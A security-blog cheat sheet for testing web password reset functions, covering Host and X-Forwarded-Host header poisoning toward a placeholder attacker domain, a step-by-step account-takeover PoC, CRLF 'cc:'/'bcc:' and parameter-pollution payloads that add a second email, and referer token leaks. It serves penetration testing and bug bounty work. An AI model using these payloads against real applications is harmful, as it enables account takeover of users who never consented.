Password Reset Testing Cheat Sheet

Header Poisoning
- Host: Header Injection Password Reset URL
Password Reset Token Filter Bypass
Email Parameter Manipulation
- Password Change Functions
  - Intercept & Change the Email
- Password Reset Functons
  - Add Second Email
Password Token Referral Header Leak
Check List

The following document outlines some key techniques used when assessing password reset function on modern web application and API’s, a useful resource for bug bounty hunters and penetration testers when performing password reset security testing.

Header Poisoning

Host: Header Injection Password Reset URL

The following headers can be modified in an attempt to modify the password reset token URL to an attacker controlled domain. Potentially allowing an attacker to obtain the reset token when a user clicks the link to perform a password reset.

Potential Vulnerable Headers

Host Header Password Reset

Replace the Host: header with a server you control.

 
Host: attackers-domain.com

Double Host Header

Often when you modify the Host header the application, or WAF fails to the process the request, a technique which can potentially bypass this filter if to simply add a second Host header to the request.

Host: target.com
Host: attackers-domain.com

X-Forwarded-Host Header

Add an attacker controlled domain in the X-forwarded-Host header directive.

Host: target.com 
X-Forwarded-Host: attackers-domain.com

Confirm Vulnerable

Perform a password reset normally, and modify the host header with a different url
Check the email sent by the application has the test url, not the applications url

PoC

Replace vulnerable header with the attacker controlled domain
Send the request
Wait for the victim to click reset link (or show PoC to a second account)
Exatract the token from the webserver logs you control
Use the extracted token to take over the user account

Password Reset Token Filter Bypass

If the app is built on ruby, try adding a .json extension to the end of the password reset URL. In certain circumstances ACL bugs may exist, adding the extension could potentially bypass any additional layers of protection the application has in in place.

Add a .json to the reset token
Observe the applications response to see if the

Email Parameter Manipulation

Password Change Functions

Intercept & Change the Email

Interecept the request, and replace the email address to one that you control

Password Reset Functons

Add Second Email

Vulnerable applications can be manipulated to send password reset codes to multiple email addresses.

Interecept the request, and add a second email address to the request

&
%20
|
%0a%0dcc:
%0a%0dbcc:

Modify the parameter matching the applications format, example:

 
email="[email protected]",email="[email protected]"

Match the API Request Schema

Match the application / API's request formatting when adding the additional email address.

Password Token Referral Header Leak

Vulnerable applications leak the password reset URL via the referal header.

Assess the target using an intercepting proxy to identify if the referral header leaks the token through the referral header.

Check List

Host Header Injection Password Reset Function
Double Host Header Injection Password Reset Function
X-Forwarded-Host Header Injection Password Reset Function
Email Parameter Manipulation add attacker controller second email address

Enjoy.

Category	Post Name
`cheat-sheet`	SQLMap Cheat Sheet - Commands & Examples Tutorial
`cheat-sheet`	Nikto Cheat Sheet - Commands & Examples
`cheat-sheet`	Subfinder Cheat Sheet
`cheat-sheet`	Naabu Cheat Sheet: Commands & Examples
`cheat-sheet`	Reverse Shell Cheat Sheet: PHP, Python, Powershell, Bash, NC, JSP, Java, Perl
`Web App Security`	Insecure Direct Object Reference (IDOR): Definition, Examples & How to Find
`cheat-sheet`	Nmap Cheat Sheet: Commands & Examples (2024)
`SecOps`	Encrypted Notes App Solution (iOS, Android, MacOS, Linux, Windows)
`cheat-sheet`	DNS Tunneling dnscat2 Cheat Sheet
`cheat-sheet`	SSH Lateral Movement Cheat Sheet

HighOn.Coffee